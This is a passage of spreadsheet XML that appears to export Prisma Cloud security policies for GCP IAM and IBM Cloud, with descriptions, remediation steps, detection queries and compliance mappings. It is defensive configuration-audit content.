      <c r="AI3299" t="inlineStr">
        <is>
          <t>3bdc95d1-a45e-4698-9af8-7e9551cb21b9</t>
        </is>
      </c>
      <c r="AJ3299" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3299" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3300">
      <c r="A3300" t="inlineStr"/>
      <c r="B3300" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3300" s="2" t="inlineStr"/>
      <c r="D3300" t="inlineStr"/>
      <c r="E3300" t="inlineStr"/>
      <c r="F3300" t="inlineStr"/>
      <c r="G3300" t="b">
        <v>1</v>
      </c>
      <c r="H33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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3300" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3300" t="inlineStr">
        <is>
          <t>GCP Compute Engine entities with predefined Admin roles</t>
        </is>
      </c>
      <c r="L3300" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3300" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3300" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3300" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3300" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3300" t="inlineStr"/>
      <c r="R3300" t="inlineStr"/>
      <c r="S3300" t="inlineStr"/>
      <c r="T3300" t="b">
        <v>0</v>
      </c>
      <c r="U3300" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3300" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3300" t="inlineStr">
        <is>
          <t>This policy identifies Predefined Admin roles that are defined as risky roles. Ensure that the Compute Engine entities in your GCP account don't have a risky Predefined Admin roles to minimize security risks.</t>
        </is>
      </c>
      <c r="X3300" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the GCP console
2. Navigate to the Compute Engine instance 
3. Navigate to the IAM service
4. Find the binding between the service account used by the Compute Engine instance and the Admin role
5. Remove the binding
6. Create a new binding with predefined or custom role without risky permissions, if necessary . Repeat if there is a binding of the service account with another Admin role.</t>
        </is>
      </c>
      <c r="Y3300" t="inlineStr"/>
      <c r="Z3300" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and source.cloud.service.name = 'compute' and source.cloud.resource.type = 'Instances' and grantedby.cloud.policy.name in ('Compute Admin','Compute Load Balancer Admin')</t>
        </is>
      </c>
      <c r="AA3300" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3300" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3300" t="inlineStr"/>
      <c r="AD3300" t="b">
        <v>1</v>
      </c>
      <c r="AE3300" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3300" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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0" t="inlineStr">
        <is>
          <t>86ddf852-f3e7-4580-b323-e9569f1a2ddb</t>
        </is>
      </c>
      <c r="AI3300" t="inlineStr">
        <is>
          <t>86ddf852-f3e7-4580-b323-e9569f1a2ddb</t>
        </is>
      </c>
      <c r="AJ3300" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3300" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3301">
      <c r="A3301" t="inlineStr"/>
      <c r="B3301" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3301" s="2" t="inlineStr"/>
      <c r="D3301" t="inlineStr"/>
      <c r="E3301" t="inlineStr"/>
      <c r="F3301" t="inlineStr"/>
      <c r="G3301" t="b">
        <v>1</v>
      </c>
      <c r="H33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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3301" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3301" t="inlineStr">
        <is>
          <t>GCP users with Service Account Token Creator role</t>
        </is>
      </c>
      <c r="L3301" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3301" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3301" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3301" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3301" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3301" t="inlineStr"/>
      <c r="R3301" t="inlineStr"/>
      <c r="S3301" t="inlineStr"/>
      <c r="T3301" t="b">
        <v>0</v>
      </c>
      <c r="U3301" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3301" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3301" t="inlineStr">
        <is>
          <t>This policy identifies GCP predefined role 'Service Account Token Creator' that is defined as risky role. Ensure that the users in your GCP environment don't have a risky 'Service Account Token Creator' role to minimize security risks.</t>
        </is>
      </c>
      <c r="X3301" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the relevant organization/folder/project
 3. Navigate to the IAM service
 4. Find the binding between the user  and the "Service Account Token Creator" role
 5. Remove the binding
 6. Create a new binding with a least privileged predefined or custom role, if necessary.</t>
        </is>
      </c>
      <c r="Y3301" t="inlineStr"/>
      <c r="Z3301" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and source.cloud.resource.type = 'user' and grantedby.cloud.policy.name = 'Service Account Token Creator'</t>
        </is>
      </c>
      <c r="AA3301" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3301" t="inlineStr">
        <is>
          <t>2024-10-30 16:43:02</t>
        </is>
      </c>
      <c r="AC3301" t="inlineStr"/>
      <c r="AD3301" t="b">
        <v>1</v>
      </c>
      <c r="AE3301" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3301" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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1" t="inlineStr">
        <is>
          <t>ceea9d4d-d15d-47c7-8f25-a84c8d78b50a</t>
        </is>
      </c>
      <c r="AI3301" t="inlineStr">
        <is>
          <t>ceea9d4d-d15d-47c7-8f25-a84c8d78b50a</t>
        </is>
      </c>
      <c r="AJ3301" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3301" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3302">
      <c r="A3302" t="inlineStr"/>
      <c r="B3302" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3302" s="2" t="inlineStr"/>
      <c r="D3302" t="n">
        <v>0</v>
      </c>
      <c r="E3302" t="n">
        <v>555</v>
      </c>
      <c r="F3302" t="n">
        <v>0</v>
      </c>
      <c r="G3302" t="b">
        <v>1</v>
      </c>
      <c r="H33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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3302" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3302" t="inlineStr">
        <is>
          <t>GCP Administrators with IAM permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3302" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3302" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3302" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3302" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3302" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3302" t="inlineStr"/>
      <c r="R3302" t="inlineStr"/>
      <c r="S3302" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3302" t="b">
        <v>1</v>
      </c>
      <c r="U3302" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3302" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3302" t="inlineStr">
        <is>
          <t>This policy identifies GCP Administrators with Stale IAM Permissions (Unused for 90 days).
Risk of Unused IAM Permissions:
GCP Service Accounts and Users with any level of IAM permissions (administrative or otherwise) that haven't been used for 90 days pose a security risk because:
Unsecured Access Point: These identities act like forgotten backdoors. If compromised, attackers can exploit them to gain access to GCP resources and perform unauthorized actions, potentially leading to data breaches, disrupting critical services, or incurring unexpected charges.
Elevated Attack Potential: IAM permissions can vary widely, with some granting high-level access to modify configurations, create new resources, or manage IAM policies. If compromised, an unused account with such permissions could be devastating.
Mitigating the Risk:
Regular Review and Removal: Proactively identify and remove unused GCP Service Accounts and Users on a regular basis (ideally less than 90 days). Focus on identities with any level of IAM permissions, not just those with administrative privileges.
Principle of Least Privilege: When creating GCP Service Accounts and Users, assign only the minimum permissions required for them to perform their specific tasks. Regularly review and adjust permissions as needed.
Service Account Keys: For service accounts, manage and rotate service account keys securely. Avoid storing keys in long-lived locations or embedding them directly in code.
IAM User Access Review: Utilize GCP IAM Recommender to identify and flag unused IAM Users and Service Accounts for review and potential removal.
Monitor for Suspicious Activity: Utilize Stackdriver Logging to track activity logs, including access attempts for GCP Service Accounts and Users. This vigilance can help detect unusual activity related to unused accounts that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3302" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the GCP console
2. Navigate to the IAM service
3. Find the binding between the service account or the user and the role with over-privileged permissions
4. Remove the binding
5. Create a new binding with a predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y3302"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302" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and action.access.isadministrative = true and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3302" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3302" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3302" t="inlineStr"/>
      <c r="AD3302" t="b">
        <v>1</v>
      </c>
      <c r="AE3302" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3302" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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2" t="inlineStr">
        <is>
          <t>7b9eae9c-0cd5-4b5f-aeff-d1c95e4869ef</t>
        </is>
      </c>
      <c r="AI3302" t="inlineStr">
        <is>
          <t>7b9eae9c-0cd5-4b5f-aeff-d1c95e4869ef</t>
        </is>
      </c>
      <c r="AJ3302" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3302" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3303">
      <c r="A3303" t="inlineStr"/>
      <c r="B3303" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3303" s="2" t="inlineStr"/>
      <c r="D3303" t="inlineStr"/>
      <c r="E3303" t="inlineStr"/>
      <c r="F3303" t="inlineStr"/>
      <c r="G3303" t="b">
        <v>1</v>
      </c>
      <c r="H33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03" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3303" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3303" t="inlineStr">
        <is>
          <t>Third-Party Service Account with High Privileges at the Folder or Organization Level</t>
        </is>
      </c>
      <c r="L3303" t="inlineStr">
        <is>
          <t>CROSS_ACCOUNT_TRUST</t>
        </is>
      </c>
      <c r="M3303" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3303" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3303" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3303" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3303" t="inlineStr"/>
      <c r="R3303" t="inlineStr"/>
      <c r="S3303" t="inlineStr"/>
      <c r="T3303" t="b">
        <v>1</v>
      </c>
      <c r="U3303" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3303" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3303" t="inlineStr">
        <is>
          <t>Identifies instances of third-party vendor owned service accounts which are granted high privileges and may allow administrative access to your cloud environment. \nThis increases the attack surface, as in case of a compromise of the vendor's environment, an attacker would gain elevated access to your account by abusing the service account permissions/</t>
        </is>
      </c>
      <c r="X3303" t="inlineStr">
        <is>
          <t>How to investigate?
1. Sign in to the GCP Console
2. Browse to the IAM service and search for the affected Service Account
3. Examine the Service Account's roles and permissions as well as its use case - if needed reach out to the vendor to validate which permissions are necessary for their functions and why. You can reference GCP's 'excess permissions' on the same screen as further information
In order to remove any unnecessary permissions and minimize the role's access, use the following remediation steps:
To revoke the vendor's access altogether, select 'edit principal' and remove all the roles from the Service Account. To minimize the access the vendor has using the Service Account, remove all unnecessary roles and attach one with the minimal permissions needed by the vendor</t>
        </is>
      </c>
      <c r="Y3303" t="inlineStr">
        <is>
          <t>'description': 'List of CLI commands are generated dynamically based on the violating resource. Successful execution will limit the relevant permissions of the violating resource.',
'impact': 'limit the relevant permissions of the violating resource',
'cliScriptTemplate': 'dynamic gcp cli commands'</t>
        </is>
      </c>
      <c r="Z3303" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND grantedby.cloud.entity.type = 'serviceaccount' AND action.access.isAdministrative = true AND source.cloud.account.isvendor = true AND grantedby.level.type IN ( 'GCP Organization', 'GCP Folder' )</t>
        </is>
      </c>
      <c r="AA3303" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3303" t="inlineStr">
        <is>
          <t>2024-10-30 17:00:50</t>
        </is>
      </c>
      <c r="AC3303" t="inlineStr"/>
      <c r="AD3303" t="b">
        <v>1</v>
      </c>
      <c r="AE3303" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3303" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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03" t="inlineStr">
        <is>
          <t>c32418c8-9baf-45c0-a75c-9dd55f237dd2</t>
        </is>
      </c>
      <c r="AI3303" t="inlineStr">
        <is>
          <t>c32418c8-9baf-45c0-a75c-9dd55f237dd2</t>
        </is>
      </c>
      <c r="AJ3303" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3303" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3304">
      <c r="A3304" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B3304" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3304" s="2" t="inlineStr"/>
      <c r="D3304" t="inlineStr"/>
      <c r="E3304" t="inlineStr"/>
      <c r="F3304" t="inlineStr"/>
      <c r="G3304" t="b">
        <v>1</v>
      </c>
      <c r="H330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4" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3304" t="inlineStr">
        <is>
          <t>ibm-activity</t>
        </is>
      </c>
      <c r="K3304" t="inlineStr">
        <is>
          <t>IBM Cloud Activity Tracker Event Routing is not configured to collect global events</t>
        </is>
      </c>
      <c r="L3304" t="inlineStr"/>
      <c r="M3304" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3304" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3304" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3304" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3304" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R3304" t="inlineStr">
        <is>
          <t>T1562.008 - Impair Defenses: Disable or Modify Cloud Logs (TA0005)</t>
        </is>
      </c>
      <c r="S3304" t="inlineStr"/>
      <c r="T3304" t="b">
        <v>0</v>
      </c>
      <c r="U3304" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3304" t="inlineStr">
        <is>
          <t>ibm-activity-tracker-route</t>
        </is>
      </c>
      <c r="W3304" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Accounts which does not have at-least one Activity tracker event route defined to collect global event's data. Activity tracker event route configured with global events collects all the global services' event data and will be sent to the target configured, which can be used for access pattern analysis from security perspective. It is recommended to define at-least one route with location set to global.</t>
        </is>
      </c>
      <c r="X3304" t="inlineStr">
        <is>
          <t>To configure an Activity tracker route to collect global events, please follow the below URL. Please make sure to provide location value either as 'global' or '*' to make the route collect global service events.:
https://cloud.ibm.com/docs/atracker?topic=atracker-route_v2&amp;interface=cli#route-create-cli</t>
        </is>
      </c>
      <c r="Y3304" t="inlineStr"/>
      <c r="Z3304" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-activity-tracker-route' AND json.rule = rules[?any( (locations[*] equal ignore case "global") or (locations[*] equals "*") )] exists as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA3304" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3304" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3304" t="inlineStr">
        <is>
          <t>PC-IBM-ATR-993</t>
        </is>
      </c>
      <c r="AD3304" t="b">
        <v>1</v>
      </c>
      <c r="AE3304" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3304" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG330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4" t="inlineStr">
        <is>
          <t>0721421c-ebe0-48ce-bcaa-5834ae016a40</t>
        </is>
      </c>
      <c r="AI3304" t="inlineStr">
        <is>
          <t>8a958ec9-5caf-46db-97ed-421c45def9f7</t>
        </is>
      </c>
      <c r="AJ3304" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3304" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3305">
      <c r="A3305" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, SOC 2, Microsoft Cloud Security Benchmark v1, DORA, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, HITRUST CSF v.11.2.0, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3305" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3305" s="2" t="inlineStr"/>
      <c r="D3305" t="inlineStr"/>
      <c r="E3305" t="inlineStr"/>
      <c r="F3305" t="inlineStr"/>
      <c r="G3305" t="b">
        <v>0</v>
      </c>
      <c r="H33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5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3305" t="inlineStr">
        <is>
          <t>ibm-event</t>
        </is>
      </c>
      <c r="K3305" t="inlineStr">
        <is>
          <t>IBM Cloud Event Stream is not encrypted with customer-managed key</t>
        </is>
      </c>
      <c r="L3305" t="inlineStr"/>
      <c r="M3305" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3305" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3305" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3305" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3305" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3305" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S3305" t="inlineStr"/>
      <c r="T3305" t="b">
        <v>0</v>
      </c>
      <c r="U3305" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3305" t="inlineStr">
        <is>
          <t>ibm-event-streams-instance</t>
        </is>
      </c>
      <c r="W3305" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Event streams that are not encrypted with a customer-managed key. The customer-managed key allows customers to ensure no one outside their organization has access to the key. And customers will have control over the lifecycle of their customer root keys where they can create, rotate, and delete those keys. As a security best practice, it is recommended to use a customer-managed key, which provides a significant level of control over the keys when used for encryption. 
Note: This policy applies to Enterprise plan Event streams only.</t>
        </is>
      </c>
      <c r="X3305" t="inlineStr">
        <is>
          <t>An Event stream can be encrypted with customer-managed keys only at the time of creation. Please follow the below instructions to encrypt an event stream with customer-managed keys while creating a new event stream.
1. Log in to the IBM Cloud Console.
2. Click on 'Catalog' on the title bar.
3. Select 'Event Streams' from the list of products, and in the create page select the pricing plan as 'Enterprise'.
4. Under the 'Encryption' section, select a key protect instance under the 'Select a Key Management Service instance' dropdown.
5. Under the 'Select a disk encryption key' dropdown, select a key other than the Automatic disk encryption key.
6. Select other configurations as per the requirements.
7. Click on 'Create'.
Make sure to transfer all the configurations/connections to the newly created Event stream before deleting the non-encrypted Event stream. Delete the vulnerable Event stream using the below instructions:
1. Log in to the IBM Cloud Console.
2. Go to Menu &gt; 'Resource List', From the 'Integration' section, select the reported event stream.
3. Click on 'Actions' button, then click on 'Delete service'.
4. Click on 'OK' to confirm.</t>
        </is>
      </c>
      <c r="Y3305" t="inlineStr"/>
      <c r="Z3305" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'ibm-event-streams-instance' AND json.rule = resource_plan_id is not member of ('ibm.eventstreams.lite', 'ibm.eventstreams.standard' ) as X; config from cloud.resource where api.name = 'ibm-key-protect-registration' as Y;filter 'not($.Y.resourceCrn equals $.X.crn)' ; show X;</t>
        </is>
      </c>
      <c r="AA3305" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3305" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3305" t="inlineStr">
        <is>
          <t>PC-IBM-IES-1030</t>
        </is>
      </c>
      <c r="AD3305" t="b">
        <v>1</v>
      </c>
      <c r="AE3305" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3305" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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5" t="inlineStr">
        <is>
          <t>e0762d2d-00b2-486a-b38e-455c22a3a11a</t>
        </is>
      </c>
      <c r="AI3305" t="inlineStr">
        <is>
          <t>2dd30da7-fbf8-4c54-a08b-20ccd5eebfba</t>
        </is>
      </c>
      <c r="AJ3305" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3305" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3306">
      <c r="A3306" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CIS v1.1.0 (IBM Cloud) Level 1, Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B3306" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3306" s="2" t="inlineStr"/>
      <c r="D3306" t="inlineStr"/>
      <c r="E3306" t="inlineStr"/>
      <c r="F3306" t="inlineStr"/>
      <c r="G3306" t="b">
        <v>1</v>
      </c>
      <c r="H33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6" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3306" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3306" t="inlineStr">
        <is>
          <t>IBM Cloud Service ID creation is not restricted in account settings</t>
        </is>
      </c>
      <c r="L3306" t="inlineStr"/>
      <c r="M3306" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3306" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3306" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3306" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3306" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R3306" t="inlineStr">
        <is>
          <t>Cloud Security Policy</t>
        </is>
      </c>
      <c r="S3306" t="inlineStr"/>
      <c r="T3306" t="b">
        <v>0</v>
      </c>
      <c r="U3306" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3306" t="inlineStr">
        <is>
          <t>ibm-iam-identity-account-setting</t>
        </is>
      </c>
      <c r="W3306" t="inlineStr">
        <is>
          <t>This policy identifies IBM cloud accounts where Service ID creation is not restricted in account settings. By default, all members of an account can create service IDs. Enabling Service ID creation setting will restrict the users from creating service IDs unless correct access is granted explicitly. It is recommended to enable Service ID creation setting and grant access only on a need basis.</t>
        </is>
      </c>
      <c r="X3306" t="inlineStr">
        <is>
          <t>Follow the below mentioned URL to enable the restriction to create service IDs:
https://cloud.ibm.com/docs/account?topic=account-restrict-service-id-create&amp;interface=ui#enable-restrict-create-serviceid-ui</t>
        </is>
      </c>
      <c r="Y3306" t="inlineStr"/>
      <c r="Z3306" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-iam-identity-account-setting' AND json.rule = restrict_create_service_id does not equal "RESTRICTED"</t>
        </is>
      </c>
      <c r="AA3306" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3306" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3306" t="inlineStr">
        <is>
          <t>PC-IBM-IAM-981</t>
        </is>
      </c>
      <c r="AD3306" t="b">
        <v>1</v>
      </c>
      <c r="AE3306" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3306" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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6" t="inlineStr">
        <is>
          <t>c1afa0d4-93de-48d0-ac79-c66232f1710d</t>
        </is>
      </c>
      <c r="AI3306" t="inlineStr">
        <is>
          <t>9fbbf2a6-794d-4d3e-8c5a-f02b4ac912da</t>
        </is>
      </c>
      <c r="AJ3306" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3306" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3307">
      <c r="A3307" t="inlineStr">
        <is>
          <t>Secure Controls Framework (SCF) - 2024.2, CIS v1.1.0 (IBM Cloud) Level 1, DORA, Insurance Regulatory And Development Authority Of India, SOC 2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B3307" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3307" s="2" t="inlineStr"/>
      <c r="D3307" t="inlineStr"/>
      <c r="E3307" t="inlineStr"/>
      <c r="F3307" t="inlineStr"/>
      <c r="G3307" t="b">
        <v>1</v>
      </c>
      <c r="H33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7" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3307" t="inlineStr">
        <is>
          <t>ibm-iam</t>
        </is>
      </c>
      <c r="K3307" t="inlineStr">
        <is>
          <t>IBM Cloud API key creation is not restricted in account settings</t>
        </is>
      </c>
      <c r="L3307" t="inlineStr"/>
      <c r="M3307" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3307" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3307" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3307" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3307" t="inlineStr">
        <is>
          <t>TA0007</t>
        </is>
      </c>
      <c r="R3307" t="inlineStr">
        <is>
          <t>T1526 - Cloud Service Discovery (TA0007)</t>
        </is>
      </c>
      <c r="S3307" t="inlineStr"/>
      <c r="T3307" t="b">
        <v>0</v>
      </c>
      <c r="U3307" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3307" t="inlineStr">
        <is>
          <t>ibm-iam-identity-account-setting</t>
        </is>
      </c>
      <c r="W3307" t="inlineStr">
        <is>
          <t>This policy identifies IBM cloud accounts where API key creation is not restricted in account settings. By default, all members of an account can create API keys. Enabling API key creation will restrict the users from creating API keys unless correct access is granted explicitly. It is recommended to enable API key creation setting and grant access only on a need basis.</t>
        </is>
      </c>
      <c r="X3307" t="inlineStr">
        <is>
          <t>Follow the below mentioned URL to enable the API key creation setting:
https://cloud.ibm.com/docs/account?topic=account-allow-api-create&amp;interface=ui#allow-all-api-create</t>
        </is>
      </c>
      <c r="Y3307" t="inlineStr"/>
      <c r="Z3307" t="inlineStr">
        <is>
